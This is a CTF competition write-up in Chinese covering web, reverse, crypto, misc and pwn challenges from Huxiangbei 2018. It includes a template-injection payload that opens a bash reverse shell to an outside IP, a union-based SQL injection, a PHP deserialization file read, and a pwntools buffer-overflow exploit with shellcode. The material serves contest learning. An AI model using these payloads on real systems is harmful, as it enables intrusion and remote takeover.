湖湘杯 2018 线上CTF WriteUp
共 15 题,解出 12 题。
比赛平台入口地址:http://hxb.erangelab.com/
Welcome - SingIn - 50pt
关注合天智汇公众号,回复hxb2018获得flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/heetian.jpg
hxb2018{W3lc0me_T0_Hxb2o18}
Web - XmeO - 150pt
管理员的flag在哪里?
47.107.235.223:9990
注册帐号,登录,提交 Todo List,然后点 Show,存在模板注入漏洞
{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('echo "bash -i >& /dev/tcp/222.85.25.45/5555 0>&1">/tmp/xx1x1') }}
{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('bash /tmp/xx1x1') }}
拿到 Shell 后全局搜索 Flag,关键词 hxb
Flag: hxb2018{510243761ff63759ed7fe96ca2759e45}
Web - Code Check - 200pt
code check
120.79.246.58:49882
源码 news 目录下 list.php
源码泄漏:http://120.79.246.58:49882/news/list.zip
<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';
//解密过程
function decode($data){
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if(substr(trim($data),-7)!=='hxb2018'){
echo '<script>window.location.href="/index.php";</script>';
}else{
return substr(trim($data),0,strlen(trim($data))-7);
}
}
$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>
Encoder
<?php
function encode($data){
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$da = mcrypt_generic($td,$data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
return base64_encode(base64_encode($da));
}
推测注入,id 加密过
http://120.79.246.58:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZ0
databases:
information_schema,mozhe_discuz_stormgroup,mysql,test
mozhe_discuz_stormgroup:
notice,notice2,stormgroup_member
notice:
id,title,content,time
notice2:
id,title
stormgroup_member:
id,name,password,status
构造:
var_dump(encode("0 union select 1,(select group_concat(title) from notice2),3,4hxb2018"));
http://120.79.246.58:49882/news/list.php?id=K3hId1N2UVpNcjFENkFja0FtMHdrM0pscGduTzFNZk1uZzVVVVdLK2hjbDVqUTBhOFl6b29YOFA1amZ5R3NUeVZOdDdOZ2luNmZMaXV4bmNRZVd1Yi9CV2hmaGJTbUdJTjJrdndKQjBEam89
Flag: hxb2018{088425ca08783233bbe9d21a3015f5f6}
Web - MyNote - 350pt
Cookie 反序列化
Warning: file_get_contents(./upload/9dd4e461268c8034f5c8564e155c67a6/1.php): failed to open stream: No such file or directory in /var/www/html/views/Views.php on line 65
<?php
$b=array("../../flag.php");
var_dump(serialize($b));
var_dump(base64_encode(serialize($b)));
unserialize(serialize($b));
cookie YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
PD9waHAKCiRmbGFnID0gImh4YjIwMTh7ODNmMmVhMDBiOTczNWQyYTQ1ZjMxNGJmMmViZmVhZTB9IjsKZWNobyAiZmxhZ3tUaGlzX2ZsYWdfaVNfQV9GNGtlX2ZsYWd9IjsKCg==
<?php
$flag = "hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}";
echo "flag{This_flag_iS_A_F4ke_flag}";
Flag: hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}
Misc - Flow - 200pt
流量取证,这个流量包中隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/flow_6D1210D1307A67E4A428602F722E6803.zip
打开全是 802.11 包
上 aircrack-ng 破解密码
可以知道,SSID 是 ctf,密码是 password1
使用 Wireshark 的自动解密功能
然后过滤器使用 http
即可看到 flag
Flag: flag{H4lf_1s_3n0ugh}
Reverse - HighwayHash64 - 300pt
口算哈希说的就是你吧~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/reverse_1CE475F54D2A3264A8ED743FDFEF24A8.zip
sub_1400017A0
为 HighwayHash64 摘要计算
flag 格式:hxb2018{xxxxx}
第一个判断,用来验证 flag 的长度,经过爆破,确定 flag 的长度为 19
第二个判断,用来验证 flag 格式内的值,也可以爆破,来确定 flag 格式内的值
需要注意,计算摘要时用到的默认 Key 被修改了
附上 flag 值爆破脚本:
from highwayhash import *
# https://github.com/kpdemetriou/highwayhash-cffi
# you need to modify sources/highwayhash.c
# void HighwayHashReset(const uint64_t key[4], HighwayHashState* state) {
# state->mul0[0] = 0x1BE6D5D5FE4CCE2Full;
# state->mul0[1] = 0x24093822299F31D0ull;
# state->mul0[2] = 0x33198A2E03707344ull;
# state->mul0[3] = 0x443F6A8885A308D3ull;
# state->mul1[0] = 0x5BD39E10CB0EF593ull;
# state->mul1[1] = 0x60ACF169B5F18A8Cull;
# state->mul1[2] = 0x7E5466CF34E90C6Cull;
# state->mul1[3] = 0x852821E638D01377ull;
# state->v0[0] = 0xCF0C0C1ED5EDF3E;
# state->v0[1] = state->mul0[1] ^ 0x3F3E3D3C3B3A1918ull;
# state->v0[2] = state->mul0[2] ^ 0x1226252423222121ull;
# state->v0[3] = state->mul0[3] ^ 0x2F2E2D2C2B2A2928ull;
# state->v1[0] = state->mul1[0] ^ 0x1312111117161514ull;
# state->v1[1] = state->mul1[1] ^ 0x3B3A19183F3E3D3Cull;
# state->v1[2] = state->mul1[2] ^ 0x2322212112262524ull;
# state->v1[3] = state->mul1[3] ^ 0x2B2A29282F2E2D2Cull;
# }
# and then, run `python3 setup.py install` to build & install it
key = b"\x00" * 32
i=0
while True:
i+=1
if i%100000==0: print (i/float(10000000000))
data=str(i)
data=data.rjust(10,'0')
data=bytes(data,'ascii')
op=highwayhash_64(key, data)
if op==b'\x5a\x54\x30\x87\xaf\x26\xbe\xe3':
print (i)
break
爆破得到 flag 格式内的值,应该是一个时间戳
Flag: hxb2018{1532649708}
Reverse - Replace - 300pt
简单的...密码学~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar
很简单,直接贴上脚本:
r=[
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
]
t='2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6'
flag=''
for i in range(35):
t1=ord(t[2*i])
t2=ord(t[2*i+1])
if t1<48 or t1>57:
t1-=87
else:
t1-=48
if t2<48 or t2>57:
t2-=87
else:
t2-=48
t1&=0xff
t2&=0xff
tmp=(t1*16+t2)^0x19
tmp&=0xff
for j in range(len(r)):
if r[j]==tmp:
flag+=chr(j)
break
print flag
Flag: flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}
Crypto - Common Crypto - 200pt
Please enter your flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/crypto/crypto_3ED9C81B3AD33F8ABEA1984B2B69284A.zip
AES 算法,挺简单的。
直接贴脚本:
from Crypto.Cipher import AES
enc='461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031'.decode('hex')
key='\x1B\x2E\x35\x46\x58\x6E\x72\x86\x9B\xA7\xB5\xC8\xD9\xEF\xFF\x0C'
mode=AES.MODE_ECB
c=AES.new(key,mode,key)
print c.decrypt(enc[:16])+enc[16:]+'}'
Flag: hxb2018{bc69322f3bd02f545c702801}
Reverse - More efficient than JS - 300pt
蓝色的火狐和黄色的谷歌更配哦~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/attach_9550FD3DD9774159E9955E2A0E389842.zip
wasm 文件逆向,可以用 wasmdec 生成伪 c 代码
然后人工分析,可以逆出验证部分的代码
附上解密脚本:
mem_data=[
0xdf, 0x81, 0x7f, 0x20, 0x07, 0xc4, 0x0d, 0x1c, 0xc9, 0x9e, 0x8e, 0x17,
0xd7, 0xed, 0x78, 0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x69, 0x6e,
0x70, 0x75, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x66, 0x6c, 0x61,
0x67, 0x3a, 0x0a, 0x00, 0x25, 0x73, 0x00, 0x49, 0x5f, 0x61, 0x6d, 0x5f,
0x6b, 0x65, 0x79, 0x00, 0x79, 0x65, 0x73, 0x00, 0x6e, 0x6f, 0x00, 0x69,
0x6e, 0x66, 0x69, 0x6e, 0x69, 0x74, 0x79, 0x00, 0x00, 0x01, 0x02, 0x04,
0x07, 0x03, 0x06, 0x05, 0x00, 0x2d, 0x2b, 0x20, 0x20, 0x20, 0x30, 0x58,
0x30, 0x78, 0x00, 0x28, 0x6e, 0x75, 0x6c, 0x6c, 0x29, 0x00, 0x2d, 0x30,
0x58, 0x2b, 0x30, 0x58, 0x20, 0x30, 0x58, 0x2d, 0x30, 0x78, 0x2b, 0x30,
0x78, 0x20, 0x30, 0x78, 0x00, 0x69, 0x6e, 0x66, 0x00, 0x49, 0x4e, 0x46,
0x00, 0x6e, 0x61, 0x6e, 0x00, 0x4e, 0x41, 0x4e, 0x00, 0x2e,
]
mem=''
for i in mem_data:
mem+=chr(i)
key=mem[4475-1024-3408:4475-1024-3408+8]
enc=mem[4432-1024-3408:4432-1024-3408+15]
print key
print enc.encode('hex')
table1=[]
table2=[]
for i in range(256):
table1.append(i)
table2.append(ord(key[i%8]))
tmp=0
for i in range(256):
tmp=(tmp+table1[i]+table2[i])&0xff
table1[i],table1[tmp]=table1[tmp],table1[i]
flag=''
tmp=0
for i in range(len(enc)):
c=(i+1)&0xff
tmp=(tmp+table1[c])&0xff
table1[c],table1[tmp]=table1[tmp],table1[c]
flag+=chr(ord(enc[i])^table1[(table1[c]+table1[tmp])&0xff])
print flag
Flag: flag{happy_rc4}
PWN - Regex Format - 350pt
关键点在正则匹配的时候,&s 在栈上可溢出,直接在 bss 写 shellcode ,然后 ROP
贴一下POC:
from pwn import *
#io=process('./pwn1')
io=remote('47.107.172.28',8888)
payload=':a\x08\x04\xa3\x50$*'
io.sendafter('format\n',payload)
shellcode='\x90'*5
shellcode+='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload='Before use it, understand it first.'
payload+='a'*0xd8+p32(0x804a350)+shellcode
io.sendafter('match\n',payload)
print io.sendlineafter('[Y/n]\n','n')
io.interactive()
Flag: hxb2018{214ebb03581966cf32cc351dd233e7fc}
Web - Readflag - 250pt
拿到题,网页提示用 url
参数来 ssrf
查看 header
,看到是 apache
,直接读配置文件
看到网站根目录下的 php 文件,继续读
源代码里在某个条件下,可以调用 readflag
文件,进而读到 flag
那么直接把 readflag
文件下载下来,逆向一下
可以看到 flag 文件就叫 flag
,直接读出来
Flag: hxb2018{0ef0c0d15f1a22b47af2a01669fbf124}
Misc - Disk - 200pt
磁盘隐写,这个磁盘上隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip
一个 vmdk 文件,看了一下里面是 NTFS 格式,可以用 RecuperaBit 来分析
分析命令如下:
python main.py ctf-flat.vmdk
[ENTER]
recoverable
tree 0
可以看到有 flag0.txt
/ flag1.txt
/ flag2.txt
/ flag3.txt
4个文件,里面都写着 flag is not here.
另外还能看到,这四个文件有 ads 流,所以隐藏数据应该在这里
用下面的命令逐个导出:
restore 0 33:ads
restore 0 34:ads
restore 0 35:ads
restore 0 36:ads
在默认输出 recuperabit_output
文件夹里可以看到,四个已经导出的 ads 流文件
4 个文件里都是 1
和 0
组成的二进制字符,将 4 个文件里的内容顺序拼接,然后二进制转换成字符串,就能得到 flag 了
Flag: flag{4DS_1n_D1sk}
Comments